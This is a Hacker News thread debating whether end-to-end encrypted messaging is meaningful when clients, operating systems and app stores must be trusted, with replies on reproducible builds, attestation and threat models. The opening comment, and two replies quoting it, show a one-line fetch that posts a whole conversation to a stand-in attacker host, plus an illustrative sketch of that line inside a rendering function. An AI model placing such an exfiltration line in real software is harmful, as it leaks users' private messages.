Hacker News

parhamn · last Wednesday at 9:54 PM

One thing I'm realizing more and more (I've been building an encrypted AI chat service powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. At the end of the day, a one-line fetch/analytics-tracker/etc. on the rendering side makes everything your protocol claimed to do useless. That goes even further, down to the OS the rendering is done on.

The last bit adds an interesting facet: even if you manage to open source the client and make it verifiably buildable by the user, you still need to distribute it through the iOS App Store, and anything can happen in the publishing process. I use iOS as the example because it's particularly tricky to load your own build of an application there.

And then, if you did all that, you'd still need to do it all on the other side of the chat too, assuming it's a multi-party chat.

You can have every cute protocol known to man and the best encryption algorithms on the wire, but at the end of the day it's all trust.

I mention this because these days I worry more that using something like Signal actually makes you a target for snooping, under the false guise that you're in a totally secure environment. If I were a government agency with intent to snoop, I'd focus my resources on Signal users; they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is about the hypothetical validity of a security protocol, usually focused on the maths, when all of it can be subverted with a fetch("https://malevolentactor.com", {method: "POST", body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?
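To make the point concrete, here is a hypothetical sketch of how a single line in the rendering layer defeats any wire protocol. All the names (renderMessage, the endpoint) are made up, and fetch is replaced with a local stub so the sketch runs offline and nothing actually leaves the machine:

```javascript
// Hypothetical sketch: a compromised rendering layer leaks plaintext that the
// wire protocol already protected. fetch is stubbed locally for illustration.
const leaked = [];
const fetch = (url, opts) => { leaked.push({ url, body: opts.body }); };

function renderMessage(convo) {
  // Legitimate rendering of the already-decrypted conversation.
  const html = convo.messages.map(m => `<p>${m.text}</p>`).join("\n");

  // The one malicious line: the plaintext is exfiltrated after decryption,
  // so the encryption on the wire never mattered.
  fetch("https://malevolentactor.example", { method: "POST", body: JSON.stringify(convo) });

  return html;
}

const convo = { messages: [{ text: "meet at noon" }] };
renderMessage(convo);
console.log(leaked.length); // 1
```

No protocol analysis would catch this; it lives entirely outside the cryptographic boundary.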


Replies

inor0gu · last Wednesday at 10:05 PM

You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicon, through the OS, all the way to how packets are forwarded from you to the person on the other end.

This makes eliminating trust an impossible goal; you're just shifting around the things you're willing to trust, or hiding them behind an abstraction.

I think what will become more important is having enough mechanisms to categorically prove whether an entity you trust to a certain extent is acting maliciously, and to hold it accountable. If economic incentives are not enough to trust a "big guy", what remains is giving all the "little guys" a loud enough loudspeaker to call out distrust.

A few examples:

- certificate transparency logs, so your traffic is not MitM'ed
- reproducible builds, so the binary you get matches the public open source code you expect it to (regardless of its quality)
- key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's

BrenBarn · last Thursday at 7:28 AM

I agree with you that the cart is getting ahead of the horse: there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages, and hence induce those users to switch to "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently lost messages.)

There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

lmm · last Thursday at 1:15 AM

> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is, IMO, pretty pointless, yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way Signal promoters call people who use cryptosystems they don't like "LARPers" is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government.)

> I also feel weird that the bulk of the discussion is about the hypothetical validity of a security protocol, usually focused on the maths, when all of it can be subverted with a fetch("https://malevolentactor.com", {method: "POST", body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (essentially, toy models of the end-to-end messaging protocol) but still not wide enough to encompass the full human-to-human part that actually matters.

MediumOwl · last Thursday at 1:29 PM

> I also feel weird that the bulk of the discussion is about the hypothetical validity of a security protocol, usually focused on the maths, when all of it can be subverted with a fetch("https://malevolentactor.com", {method: "POST", body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on public wifi was playing Russian roulette, and signals intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of lower priority than network encryption.

redleader55 · last Wednesday at 11:41 PM

I think part of what you are talking about is sometimes called "attestation": basically a signature, with a root you trust, that confirms beyond doubt the provenance of the entity (phone + OS + app) you interact with.

Android has this and can confirm to a third party that the phone is running, for example, a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + LineageOS (as an example) as "original" software.

The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

A fully transparent attested artifact, one that doesn't involve blind trust in an entity like Google, would use a ledger with the hashes and binaries of the components being attested, instead of a root of trust based on signatures.

All of the above is technically possible, but not implemented today in a way that makes this feasible. I'm confident that with enough interest it will eventually be implemented.

solarkraft · last Thursday at 8:49 AM

> "E2E encryption" really requires the client to be built and verified by the end user

We probably agree that this is infeasible for the vast majority of people.

Luckily reproducible builds somewhat sidestep this in a more practical way.

edgineer · last Thursday at 6:19 AM

I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

[0] https://github.com/maqp/tfc

aembleton · last Thursday at 9:11 AM

> "E2E encryption" really requires the client to be built and verified by the end user

But the OS might be compromised with a screen recorder or a keylogger, so you'd need the full client, OS, and hardware to be built by the end user. But then the client they're sending to might be compromised... or even the person on the other end might be.

At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

SheinhardtWigCo · last Wednesday at 10:07 PM

It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.
